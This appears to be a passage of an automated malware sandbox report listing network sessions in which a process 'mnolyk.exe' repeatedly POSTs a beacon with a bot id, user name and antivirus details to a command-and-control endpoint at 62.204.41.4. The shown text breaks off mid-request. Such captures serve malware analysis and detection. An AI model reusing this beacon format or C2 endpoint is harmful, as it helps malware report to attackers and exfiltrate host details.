                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:18.029665947 CET755INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        556192.168.2.55024662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:18.198358059 CET756OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:18.267981052 CET756INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        557192.168.2.55024762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:18.456525087 CET757OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:18.521711111 CET757INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        558192.168.2.55024862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:18.703803062 CET758OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:18.769320965 CET758INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        559192.168.2.55024962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:18.949647903 CET759OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:19.013935089 CET759INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        56192.168.2.54974662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:57.847861052 CET257OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:57.920320988 CET257INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        560192.168.2.55025062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:19.184250116 CET760OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:19.252294064 CET760INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        561192.168.2.55025162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:19.419157028 CET761OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:19.485268116 CET761INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        562192.168.2.55025262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:19.663269997 CET762OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:19.728203058 CET762INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        563192.168.2.55025362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:19.903146029 CET763OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:19.967570066 CET763INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        564192.168.2.55025462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:20.138555050 CET764OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:20.204947948 CET764INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        565192.168.2.55025562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:20.388212919 CET765OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:20.453283072 CET765INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        566192.168.2.55025662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:20.620518923 CET766OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:20.685688972 CET766INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        567192.168.2.55025762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:20.856194973 CET767OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:20.922713995 CET767INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        568192.168.2.55025862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:21.108803988 CET768OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:21.177926064 CET768INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        569192.168.2.55025962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:21.359169960 CET769OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:21.423146963 CET769INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        57192.168.2.54974762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:58.093214035 CET258OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:58.160079002 CET258INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        570192.168.2.55026062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:21.606827974 CET770OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:21.674019098 CET770INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        571192.168.2.55026162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:21.842035055 CET771OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:21.908354044 CET771INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        572192.168.2.55026262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:22.073796988 CET772OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:22.141985893 CET772INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        573192.168.2.55026362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:22.314338923 CET773OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
